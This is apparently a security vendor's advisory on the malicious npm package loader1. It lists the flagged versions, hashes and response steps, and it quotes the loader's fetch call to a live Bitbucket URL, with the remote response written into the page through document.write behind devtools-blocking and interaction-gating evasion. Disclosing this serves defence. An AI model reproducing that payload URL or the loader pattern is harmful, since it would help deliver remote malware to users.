Your RSA-2048 keys break in 2030. Find every one of them before attackers do.
Malicious package

loader1npm

loader1 is a confirmed malicious npm package (MAL-2026-10696) that executes malicious code on install (malicious versions 2.1.2, 2.1.3, 2.1.4…). Do not install it — remove it immediately and rotate any exposed credentials.

Malicious code in loader1 (npm)

MAL-2026-10696
Immediate action
Remove the package, then rotate any secrets the build/runtime could reach.
npm uninstall loader1

What this malware does

The npm package's only file of substance is index.html (declared as main in package.json). When opened in a browser, the page first disables developer-tools shortcuts (F12, Ctrl+Shift+I/J/C, Ctrl+U, Ctrl+S, right-click) and gates execution behind a real user-input check (mousemove/click/keydown within 1200ms, otherwise it shows "Blocked (no interaction)" and stops). Once the gate passes, it executes fetch("https://bitbucket.org/p2p-alt-public/p2p-emis/raw/main/GameWebSight") and feeds the response into document.write(html), which executes any <script> tags in the returned content. The Bitbucket source is unpinned (raw/main/...), publisher-anonymous (p2p-alt-public), and mutable — whoever controls that repository can swap the served payload at any time without republishing the npm package. Combined with empty author, generic description ("single file websight"), and the fact that main: index.html cannot be require()d as a Node library, the package has no legitimate library purpose; its only function is to deliver the gated remote-fetch loader. The devtools-blocking + interaction-gating pattern is canonical hostile-loader / redirector evasion against automated scanners.

Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.

Malicious versions

6 flagged
2.1.22.1.32.1.42.1.52.1.62.1.7

Indicators of compromise (SHA-256)

dc402f9d8e63016f89d3140a00c59d5e84d0c71eac453a83dac2858558760d5d
cd229ca4e2277c5d48e5094c928e156292a44c3b7371ebbf749ef13a08b2fb42
e9578c2db9f9fd58bb7b743e3ca8581aa21f4632bb965dcb53b7a4aaa02e5667
0d62782496cf71627f79c57bd660be03b2161ab646d82139923d84ca17adf8a3
ab2a56b22929c62b081ce423598550f6de633fdd603a60afa0ed88953a4af52d
d563124c721050c0fdf411726937a21aa5d1f0dfd95bf415e965d858515eae13
e15a852d5059620c9ee20b20a227907363f1b83c05bf642f2f077d11b4d08f66

Detection & response playbook

Malicious package
  1. Find it

    Scan your lockfiles (package-lock.json, pnpm-lock.yaml, yarn.lock, requirements.txt, poetry.lock, etc.) and build artifacts for loader1 (6 malicious versions). O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, flagging loader1 across your stack and pipelines.

  2. If you installed it — respond

    Remove loader1 from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound activity or persistence.

  3. Did it already run?

    If loader1 was ever installed, its post-install/runtime payload may have already executed. O3's L7 egress monitoring and runtime eBPF sensors detect the credential exfiltration or command-and-control callback after install and block the malicious outbound channel, so you catch and contain the actual compromise — not just the presence of the package.

  4. How O3 protects you

    O3 blocks loader1 before install through its supply-chain scanner, and if it has already run, detects and severs the exfiltration or C2 callback at runtime through L7 egress monitoring and eBPF.

Frequently asked questions

No. loader1 on npm has been identified as a malicious package (versions 2.1.2, 2.1.3, 2.1.4, 2.1.5, 2.1.6, 2.1.7 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

GHSA-wp48-4xqv-v7fqIN-MAL-2026-010791IN-MAL-2026-010792IN-MAL-2026-010788IN-MAL-2026-010790IN-MAL-2026-011249IN-MAL-2026-011285

References

Credits

  • Amazon Inspector · finder

Detect & block this

O3 blocks loader1-class packages before install and in CI — and if it already ran, its runtime egress monitoring catches the malicious outbound activity and severs the channel.

Explore

loader1 (npm) malicious package — MAL-2026-10696 | O3 Security